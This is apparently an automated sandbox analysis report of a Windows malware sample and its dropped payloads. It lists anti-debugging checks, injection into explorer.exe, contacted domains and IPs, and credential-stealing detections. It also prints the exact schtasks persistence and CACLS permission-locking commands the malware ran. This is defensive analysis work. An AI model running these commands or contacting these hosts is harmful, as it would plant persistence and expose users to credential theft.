                                Source: C:\Users\user\AppData\Local\Temp\65C3.exeCode function: 14_2_0105F909 FindFirstFileExW,14_2_0105F909
                                Source: C:\Users\user\AppData\Local\Temp\cb465ca805\nbveek.exeCode function: 15_2_0118F909 FindFirstFileExW,15_2_0118F909
                                Source: C:\Users\user\Desktop\Ej3vSx3p8Y.exeSystem information queried: ModuleInformationJump to behavior

                                Anti Debugging

                                barindex
                                Source: C:\Users\user\Desktop\Ej3vSx3p8Y.exeSystem information queried: CodeIntegrityInformationJump to behavior
                                Source: C:\Users\user\Desktop\Ej3vSx3p8Y.exeCode function: 0_2_02D80D90 mov eax, dword ptr fs:[00000030h]0_2_02D80D90
                                Source: C:\Users\user\Desktop\Ej3vSx3p8Y.exeCode function: 0_2_02D8092B mov eax, dword ptr fs:[00000030h]0_2_02D8092B
                                Source: C:\Users\user\AppData\Local\Temp\6267.exeCode function: 13_2_001DA651 mov eax, dword ptr fs:[00000030h]13_2_001DA651
                                Source: C:\Users\user\AppData\Local\Temp\6267.exeCode function: 13_2_001DCC62 mov eax, dword ptr fs:[00000030h]13_2_001DCC62
                                Source: C:\Users\user\AppData\Local\Temp\65C3.exeCode function: 14_2_0105CC62 mov eax, dword ptr fs:[00000030h]14_2_0105CC62
                                Source: C:\Users\user\AppData\Local\Temp\65C3.exeCode function: 14_2_0105A651 mov eax, dword ptr fs:[00000030h]14_2_0105A651
                                Source: C:\Users\user\AppData\Local\Temp\cb465ca805\nbveek.exeCode function: 15_2_0118A651 mov eax, dword ptr fs:[00000030h]15_2_0118A651
                                Source: C:\Users\user\AppData\Local\Temp\cb465ca805\nbveek.exeCode function: 15_2_0118CC62 mov eax, dword ptr fs:[00000030h]15_2_0118CC62
                                Source: C:\Users\user\Desktop\Ej3vSx3p8Y.exeProcess queried: DebugPortJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\6267.exeCode function: 13_2_001D75C0 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,13_2_001D75C0
                                Source: C:\Users\user\AppData\Local\Temp\6267.exeCode function: 13_2_001E0B60 GetProcessHeap,13_2_001E0B60
                                Source: C:\Users\user\AppData\Local\Temp\1000014001\anon.exeMemory allocated: page read and write | page guard
                                Source: C:\Users\user\AppData\Local\Temp\6267.exeCode function: 13_2_001D7725 SetUnhandledExceptionFilter,13_2_001D7725
                                Source: C:\Users\user\AppData\Local\Temp\6267.exeCode function: 13_2_001D75C0 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,13_2_001D75C0
                                Source: C:\Users\user\AppData\Local\Temp\6267.exeCode function: 13_2_001DB7D2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,13_2_001DB7D2
                                Source: C:\Users\user\AppData\Local\Temp\6267.exeCode function: 13_2_001D6EB8 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,13_2_001D6EB8
                                Source: C:\Users\user\AppData\Local\Temp\65C3.exeCode function: 14_2_01057725 SetUnhandledExceptionFilter,14_2_01057725
                                Source: C:\Users\user\AppData\Local\Temp\65C3.exeCode function: 14_2_010575C0 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,14_2_010575C0
                                Source: C:\Users\user\AppData\Local\Temp\65C3.exeCode function: 14_2_0105B7D2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,14_2_0105B7D2
                                Source: C:\Users\user\AppData\Local\Temp\65C3.exeCode function: 14_2_01056EB8 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,14_2_01056EB8
                                Source: C:\Users\user\AppData\Local\Temp\cb465ca805\nbveek.exeCode function: 15_2_01187725 SetUnhandledExceptionFilter,15_2_01187725
                                Source: C:\Users\user\AppData\Local\Temp\cb465ca805\nbveek.exeCode function: 15_2_011875C0 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,15_2_011875C0
                                Source: C:\Users\user\AppData\Local\Temp\cb465ca805\nbveek.exeCode function: 15_2_0118B7D2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,15_2_0118B7D2
                                Source: C:\Users\user\AppData\Local\Temp\cb465ca805\nbveek.exeCode function: 15_2_01186EB8 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,15_2_01186EB8

                                HIPS / PFW / Operating System Protection Evasion

                                barindex
                                Source: C:\Windows\explorer.exeDomain query: potunulit.org
                                Source: C:\Windows\explorer.exeDomain query: polyzi.com
                                Source: C:\Windows\explorer.exeDomain query: vatra.at
                                Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 62.204.41.109 80
                                Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 192.168.2.4 80
                                Source: C:\Windows\explorer.exeNetwork Connect: 62.204.41.145 80Jump to behavior
                                Source: C:\Windows\explorer.exeDomain query: degroeneuitzender.nl
                                Source: C:\Windows\explorer.exeNetwork Connect: 194.135.33.28 80Jump to behavior
                                Source: C:\Windows\explorer.exeDomain query: lazydowns.com
                                Source: C:\Windows\explorer.exeFile created: vhifwju.3.drJump to dropped file
                                Source: C:\Users\user\Desktop\Ej3vSx3p8Y.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read writeJump to behavior
                                Source: C:\Users\user\Desktop\Ej3vSx3p8Y.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and readJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\79AB.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read writeJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\79AB.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and readJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cb465ca805\nbveek.exeMemory written: C:\Users\user\AppData\Local\Temp\cb465ca805\nbveek.exe base: 400000 value starts with: 4D5AJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\6D94.exeMemory written: C:\Users\user\AppData\Local\Temp\6D94.exe base: 400000 value starts with: 4D5AJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\6267.exeCode function: 13_2_001C3750 GetModuleFileNameA,CreateProcessA,VirtualAlloc,GetThreadContext,ReadProcessMemory,GetModuleHandleA,GetProcAddress,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,ResumeThread,VirtualFree,VirtualFree,13_2_001C3750
                                Source: C:\Users\user\Desktop\Ej3vSx3p8Y.exeThread created: C:\Windows\explorer.exe EIP: 4611B14Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\79AB.exeThread created: unknown EIP: 47B19E0Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\6D94.exeSection unmapped: C:\Windows\SysWOW64\cmd.exe base address: 400000Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\6267.exeProcess created: C:\Users\user\AppData\Local\Temp\cb465ca805\nbveek.exe "C:\Users\user\AppData\Local\Temp\cb465ca805\nbveek.exe" Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\65C3.exeProcess created: C:\Users\user\AppData\Local\Temp\cb465ca805\nbveek.exe "C:\Users\user\AppData\Local\Temp\cb465ca805\nbveek.exe" Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cb465ca805\nbveek.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN nbveek.exe /TR "C:\Users\user\AppData\Local\Temp\cb465ca805\nbveek.exe" /FJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cb465ca805\nbveek.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "nbveek.exe" /P "user:N"&&CACLS "nbveek.exe" /P "user:R" /E&&echo Y|CACLS "..\cb465ca805" /P "user:N"&&CACLS "..\cb465ca805" /P "user:R" /E&&ExitJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cb465ca805\nbveek.exeProcess created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\006700e5a2ab05\cred64.dll, MainJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cb465ca805\nbveek.exeProcess created: C:\Users\user\AppData\Local\Temp\1000013001\Legno.exe "C:\Users\user\AppData\Local\Temp\1000013001\Legno.exe" Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cb465ca805\nbveek.exeProcess created: C:\Users\user\AppData\Local\Temp\1000014001\anon.exe "C:\Users\user\AppData\Local\Temp\1000014001\anon.exe" Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cb465ca805\nbveek.exeProcess created: C:\Users\user\AppData\Local\Temp\cb465ca805\nbveek.exe C:\Users\user\AppData\Local\Temp\cb465ca805\nbveek.exeJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\6D94.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"Jump to behavior
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"Jump to behavior
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cacls.exe CACLS "nbveek.exe" /P "user:N"Jump to behavior
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cacls.exe CACLS "nbveek.exe" /P "user:R" /EJump to behavior
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"Jump to behavior
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cacls.exe CACLS "..\cb465ca805" /P "user:N"Jump to behavior
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cacls.exe CACLS "..\cb465ca805" /P "user:R" /EJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1000013001\Legno.exeProcess created: C:\Users\user\AppData\Local\Temp\5ca56b659f\nbveek.exe "C:\Users\user\AppData\Local\Temp\5ca56b659f\nbveek.exe"
                                Source: C:\Users\user\AppData\Local\Temp\8C99.exeProcess created: C:\Users\user\AppData\Local\Temp\0277f5d4dc\nbveek.exe "C:\Users\user\AppData\Local\Temp\0277f5d4dc\nbveek.exe"
                                Source: C:\Users\user\AppData\Local\Temp\cb465ca805\nbveek.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=nbveek.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
                                Source: C:\Users\user\AppData\Local\Temp\cb465ca805\nbveek.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=nbveek.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
                                Source: C:\Users\user\AppData\Local\Temp\8FF5.exeProcess created: C:\Users\user\AppData\Local\Temp\0277f5d4dc\nbveek.exe "C:\Users\user\AppData\Local\Temp\0277f5d4dc\nbveek.exe"
                                Source: C:\Users\user\AppData\Local\Temp\0277f5d4dc\nbveek.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN nbveek.exe /TR "C:\Users\user\AppData\Local\Temp\0277f5d4dc\nbveek.exe" /F
                                Source: C:\Users\user\AppData\Local\Temp\0277f5d4dc\nbveek.exeProcess created: unknown unknown
                                Source: C:\Users\user\AppData\Local\Temp\5ca56b659f\nbveek.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN nbveek.exe /TR "C:\Users\user\AppData\Local\Temp\5ca56b659f\nbveek.exe" /F
                                Source: C:\Users\user\AppData\Local\Temp\5ca56b659f\nbveek.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "nbveek.exe" /P "user:N"&&CACLS "nbveek.exe" /P "user:R" /E&&echo Y|CACLS "..\5ca56b659f" /P "user:N"&&CACLS "..\5ca56b659f" /P "user:R" /E&&Exit
                                Source: C:\Users\user\AppData\Local\Temp\5ca56b659f\nbveek.exeProcess created: unknown unknown
                                Source: C:\Users\user\AppData\Local\Temp\AAE1.exeProcess created: unknown unknown
                                Source: C:\Users\user\AppData\Local\Temp\AAE1.exeProcess created: unknown unknown
                                Source: C:\Users\user\AppData\Local\Temp\CEE7.exeProcess created: unknown unknown
                                Source: C:\Users\user\AppData\Local\Temp\CEE7.exeProcess created: unknown unknown
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                                Source: C:\Users\user\AppData\Local\Temp\cb465ca805\nbveek.exeCode function: 15_2_01173990 ShellExecuteA,15_2_01173990
                                Source: explorer.exe, 00000003.00000000.431358162.0000000000E50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.386016457.0000000000E50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.413453195.0000000000E50000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: EProgram Managerzx
                                Source: explorer.exe, 00000003.00000000.431358162.0000000000E50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.417494662.0000000005C70000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.386016457.0000000000E50000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                                Source: explorer.exe, 00000003.00000000.431358162.0000000000E50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.386016457.0000000000E50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.413453195.0000000000E50000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                                Source: explorer.exe, 00000003.00000000.413173719.00000000009C8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.430936399.00000000009C8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.385855915.00000000009C8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Progmanath
                                Source: explorer.exe, 00000003.00000000.431358162.0000000000E50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.386016457.0000000000E50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.413453195.0000000000E50000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                                Source: C:\Users\user\AppData\Local\Temp\cb465ca805\nbveek.exeQueries volume information: C:\Users\user\AppData\Roaming\006700e5a2ab05\cred64.dll VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cb465ca805\nbveek.exeQueries volume information: C:\Users\user\AppData\Roaming\006700e5a2ab05\cred64.dll VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cb465ca805\nbveek.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1000013001\Legno.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cb465ca805\nbveek.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1000013001\Legno.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cb465ca805\nbveek.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1000014001\anon.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cb465ca805\nbveek.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1000014001\anon.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1000014001\anon.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1000014001\anon.exe VolumeInformation
                                Source: C:\Users\user\AppData\Local\Temp\1000014001\anon.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation
                                Source: C:\Users\user\AppData\Local\Temp\1000014001\anon.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation
                                Source: C:\Users\user\AppData\Local\Temp\1000014001\anon.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
                                Source: C:\Users\user\AppData\Local\Temp\1000014001\anon.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation
                                Source: C:\Users\user\AppData\Local\Temp\1000014001\anon.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                                Source: C:\Users\user\AppData\Local\Temp\1000014001\anon.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                                Source: C:\Users\user\AppData\Local\Temp\1000014001\anon.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                                Source: C:\Users\user\AppData\Local\Temp\0277f5d4dc\nbveek.exeQueries volume information: C:\Users\user\AppData\Local\Temp\0277f5d4dc\nbveek.exe VolumeInformation
                                Source: C:\Users\user\AppData\Local\Temp\0277f5d4dc\nbveek.exeQueries volume information: C:\Users\user\AppData\Local\Temp\853321935212 VolumeInformation
                                Source: C:\Users\user\AppData\Local\Temp\0277f5d4dc\nbveek.exeQueries volume information: C:\Users\user\AppData\Local\Temp\853321935212 VolumeInformation
                                Source: C:\Users\user\AppData\Local\Temp\0277f5d4dc\nbveek.exeQueries volume information: C:\Users\user\AppData\Roaming\07c6bc37dc5087\cred64.dll VolumeInformation
                                Source: C:\Users\user\AppData\Local\Temp\0277f5d4dc\nbveek.exeQueries volume information: C:\Users\user\AppData\Roaming\07c6bc37dc5087\cred64.dll VolumeInformation
                                Source: C:\Users\user\AppData\Local\Temp\0277f5d4dc\nbveek.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1000014001\2.exe VolumeInformation
                                Source: C:\Users\user\AppData\Local\Temp\0277f5d4dc\nbveek.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1000014001\2.exe VolumeInformation
                                Source: C:\Users\user\AppData\Local\Temp\0277f5d4dc\nbveek.exeQueries volume information: C:\Users\user\AppData\Local\Temp\853321935212 VolumeInformation
                                Source: C:\Users\user\AppData\Local\Temp\0277f5d4dc\nbveek.exeQueries volume information: C:\Users\user\AppData\Local\Temp\853321935212 VolumeInformation
                                Source: C:\Users\user\AppData\Local\Temp\5ca56b659f\nbveek.exeQueries volume information: C:\Users\user\AppData\Local\Temp\5ca56b659f\nbveek.exe VolumeInformation
                                Source: C:\Users\user\AppData\Local\Temp\5ca56b659f\nbveek.exeQueries volume information: C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dll VolumeInformation
                                Source: C:\Users\user\AppData\Local\Temp\5ca56b659f\nbveek.exeQueries volume information: C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dll VolumeInformation
                                Source: C:\Users\user\AppData\Local\Temp\AAE1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\AAE1.exe VolumeInformation
                                Source: C:\Users\user\AppData\Local\Temp\CEE7.exeQueries volume information: C:\Users\user\AppData\Local\Temp\CEE7.exe VolumeInformation
                                Source: C:\Users\user\AppData\Local\Temp\6267.exeCode function: 13_2_001D77AD cpuid 13_2_001D77AD
                                Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                                Source: C:\Users\user\AppData\Roaming\fgifwjuCode function: 12_2_0040A7EF GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,12_2_0040A7EF
                                Source: C:\Users\user\AppData\Local\Temp\6267.exeCode function: 13_2_001E3928 _free,_free,_free,GetTimeZoneInformation,_free,13_2_001E3928
                                Source: C:\Users\user\AppData\Local\Temp\6267.exeCode function: 13_2_001CA1D0 GetUserNameA,SetCurrentDirectoryA,13_2_001CA1D0
                                Source: C:\Users\user\AppData\Local\Temp\6267.exeCode function: 13_2_001C4400 GetVersionExW,GetModuleHandleA,GetProcAddress,GetSystemInfo,13_2_001C4400
                                Source: anon.exe, 0000001D.00000002.903759026.0000000006041000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

                                Stealing of Sensitive Information

                                barindex
                                Source: Yara matchFile source: dump.pcap, type: PCAP
                                Source: Yara matchFile source: 31.2.nbveek.exe.400000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 29.0.anon.exe.7d0000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 0000000F.00000003.499378760.0000000003F59000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000001F.00000002.569124856.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000001D.00000000.496552203.00000000007D2000.00000002.00000001.01000000.00000010.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000F.00000002.846222644.0000000003F59000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: Process Memory Space: anon.exe PID: 1700, type: MEMORYSTR
                                Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\anon[1].exe, type: DROPPED
                                Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\1000014001\anon.exe, type: DROPPED
                                Source: Yara matchFile source: 40.2.AAE1.exe.4b57f90.1.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 30.0.8C99.exe.b0000.1.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 30.0.8C99.exe.b0000.3.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 13.0.6267.exe.1c0000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 17.2.nbveek.exe.1170000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 30.0.8C99.exe.b0000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 15.0.nbveek.exe.1170000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 13.0.6267.exe.1c0000.3.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 28.0.Legno.exe.fb0000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 30.0.8C99.exe.b0000.2.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 32.0.8FF5.exe.2f0000.1.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 39.0.nbveek.exe.de0000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 32.0.8FF5.exe.2f0000.2.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 32.2.8FF5.exe.2f0000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 28.2.Legno.exe.fb0000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 40.2.AAE1.exe.4b57f90.1.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 13.0.6267.exe.1c0000.2.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 14.0.65C3.exe.1040000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 15.2.nbveek.exe.1170000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 17.0.nbveek.exe.1170000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 31.2.nbveek.exe.1170000.1.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 13.0.6267.exe.1c0000.1.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 32.0.8FF5.exe.2f0000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 14.2.65C3.exe.1040000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 13.2.6267.exe.1c0000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 14.0.65C3.exe.1040000.2.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 32.0.8FF5.exe.2f0000.3.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 39.2.nbveek.exe.de0000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 31.0.nbveek.exe.1170000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 14.0.65C3.exe.1040000.3.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 14.0.65C3.exe.1040000.1.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 38.0.nbveek.exe.340000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 38.2.nbveek.exe.340000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 37.0.nbveek.exe.340000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 37.2.nbveek.exe.340000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 30.2.8C99.exe.b0000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 40.2.AAE1.exe.47a0150.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 0000000D.00000000.474324647.00000000001C1000.00000020.00000001.01000000.00000007.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000D.00000000.474123082.00000000001C1000.00000020.00000001.01000000.00000007.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000001E.00000000.497085000.00000000000B1000.00000020.00000001.01000000.00000011.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000D.00000002.484775584.00000000001C1000.00000020.00000001.01000000.00000007.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000E.00000000.476139929.0000000001041000.00000020.00000001.01000000.00000008.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000020.00000000.501595040.00000000002F1000.00000020.00000001.01000000.00000014.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000001E.00000000.497186202.00000000000B1000.00000020.00000001.01000000.00000011.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000020.00000002.523361261.00000000002F1000.00000020.00000001.01000000.00000014.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000025.00000002.523815460.0000000000341000.00000020.00000001.01000000.00000016.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000001F.00000002.576692598.0000000001171000.00000020.00000001.01000000.00000009.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000001F.00000000.499169836.0000000001171000.00000020.00000001.01000000.00000009.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000F.00000002.829313641.0000000001171000.00000020.00000001.01000000.00000009.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000001E.00000000.496822536.00000000000B1000.00000020.00000001.01000000.00000011.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000001E.00000002.523347710.00000000000B1000.00000020.00000001.01000000.00000011.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000D.00000000.474232440.00000000001C1000.00000020.00000001.01000000.00000007.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000001C.00000000.494507476.0000000000FB1000.00000020.00000001.01000000.0000000F.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000D.00000000.473891939.00000000001C1000.00000020.00000001.01000000.00000007.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000026.00000002.839241764.0000000000341000.00000020.00000001.01000000.00000016.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000011.00000000.485779628.0000000001171000.00000020.00000001.01000000.00000009.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000026.00000000.513805010.0000000000341000.00000020.00000001.01000000.00000016.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000028.00000002.688050042.0000000004B4D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000011.00000002.487641189.0000000001171000.00000020.00000001.01000000.00000009.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000E.00000000.476296569.0000000001041000.00000020.00000001.01000000.00000008.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000E.00000000.475679281.0000000001041000.00000020.00000001.01000000.00000008.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000E.00000002.490254347.0000000001041000.00000020.00000001.01000000.00000008.sdmp, type: MEMORY
